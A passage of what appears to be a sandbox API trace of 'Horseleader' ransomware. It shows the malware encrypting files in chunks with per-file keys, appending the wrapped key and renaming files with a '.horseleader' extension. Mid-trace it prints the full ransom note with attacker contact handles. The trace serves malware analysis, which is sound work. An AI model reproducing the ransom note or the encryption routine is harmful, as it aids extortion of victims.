Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.horseleader") returned 97 [0187.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.horseleader")) returned 1 [0187.912] GetProcessHeap () returned 0x780000 [0187.912] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0187.912] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0187.912] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0187.912] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0187.913] StrStrIW (lpFirst="Proof.msi", lpSrch=".horseleader") returned 0x0 [0187.913] lstrcmpW (lpString1="Proof.msi", lpString2="#Decrypt#.txt") returned 1 [0187.913] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0187.913] lstrlenW (lpString=".testttjffg") returned 11 [0187.913] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpSrch=".testttjffg") 
returned 0x0 [0187.913] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0187.913] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0187.914] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.945] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0187.945] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0187.945] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=885760) returned 1 [0187.945] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.945] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0187.948] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0187.948] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0187.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x69a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.949] 
ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0188.850] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0188.850] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0188.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd3400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.851] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0189.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.008] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0189.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0189.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0189.009] CloseHandle (hObject=0x158) returned 1 [0189.729] GetProcessHeap () returned 0x780000 [0189.729] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0189.729] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.horseleader") returned 97 [0189.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.horseleader")) returned 1 [0189.730] GetProcessHeap () returned 0x780000 [0189.730] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0189.731] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0189.731] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0189.731] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0189.731] StrStrIW (lpFirst="Proof.xml", lpSrch=".horseleader") returned 0x0 
[0189.731] lstrcmpW (lpString1="Proof.xml", lpString2="#Decrypt#.txt") returned 1 [0189.731] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0189.732] lstrlenW (lpString=".testttjffg") returned 11 [0189.732] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpSrch=".testttjffg") returned 0x0 [0189.732] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0189.733] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0189.733] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.733] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0189.733] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0189.733] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1458) returned 1 [0189.733] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5b2, lpOverlapped=0x0) returned 1 [0189.739] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.739] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5b2, lpOverlapped=0x0) returned 1 [0189.739] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.739] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0189.739] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0189.740] CloseHandle (hObject=0x158) returned 1 [0189.743] GetProcessHeap () returned 0x780000 [0189.743] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0189.743] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.horseleader") returned 97 [0189.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.horseleader")) returned 1 [0189.750] GetProcessHeap () returned 0x780000 [0189.750] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0189.750] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, 
ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0189.750] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0189.750] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\#Decrypt#.txt") returned 89 [0189.750] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0189.751] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0189.751] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0189.753] lstrlenA (lpString="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") returned 1368 [0189.753] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0189.753] CloseHandle (hObject=0x21c) returned 1 [0189.753] GetProcessHeap () returned 0x780000 [0189.753] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0189.753] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0189.753] lstrcmpiW (lpString1="Proofing.msi", lpString2="Windows") returned -1 [0189.754] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0189.754] StrStrIW (lpFirst="Proofing.msi", lpSrch=".horseleader") returned 0x0 [0189.754] lstrcmpW (lpString1="Proofing.msi", lpString2="#Decrypt#.txt") returned 1 [0189.754] lstrcmpW (lpString1="Proofing.msi", lpString2="_uninstalling_.png") returned 1 [0189.754] lstrlenW (lpString=".testttjffg") returned 11 [0189.754] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", lpSrch=".testttjffg") returned 0x0 [0189.754] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0189.754] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0189.754] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0189.755] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0189.755] StrStrW (lpFirst="Proofing.msi", lpSrch=".txt") returned 0x0 [0189.755] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=868864) returned 1 [0189.755] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.755] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.759] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.759] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.759] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x67900, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.759] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.773] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0189.773] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0189.773] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xcf200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.773] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0190.074] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0190.074] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0190.074] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.075] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0190.075] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, 
lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0190.075] CloseHandle (hObject=0x21c) returned 1 [0190.620] GetProcessHeap () returned 0x780000 [0190.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0190.620] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.horseleader") returned 91 [0190.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.horseleader")) returned 1 [0190.621] GetProcessHeap () returned 0x780000 [0190.621] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0190.621] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0190.621] lstrcmpiW (lpString1="Proofing.xml", lpString2="Windows") returned -1 [0190.621] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0190.621] StrStrIW (lpFirst="Proofing.xml", lpSrch=".horseleader") returned 
0x0 [0190.621] lstrcmpW (lpString1="Proofing.xml", lpString2="#Decrypt#.txt") returned 1 [0190.621] lstrcmpW (lpString1="Proofing.xml", lpString2="_uninstalling_.png") returned 1 [0190.621] lstrlenW (lpString=".testttjffg") returned 11 [0190.622] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".testttjffg") returned 0x0 [0190.622] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0190.622] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0190.622] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0190.622] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0190.622] StrStrW (lpFirst="Proofing.xml", lpSrch=".txt") returned 0x0 [0190.622] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=811) returned 1 [0190.622] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x32b, lpOverlapped=0x0) returned 1 [0190.945] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffcd5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0190.945] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, 
lpNumberOfBytesWritten=0x32af06c*=0x32b, lpOverlapped=0x0) returned 1 [0190.945] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.946] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0190.946] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0190.946] CloseHandle (hObject=0x21c) returned 1 [0190.947] GetProcessHeap () returned 0x780000 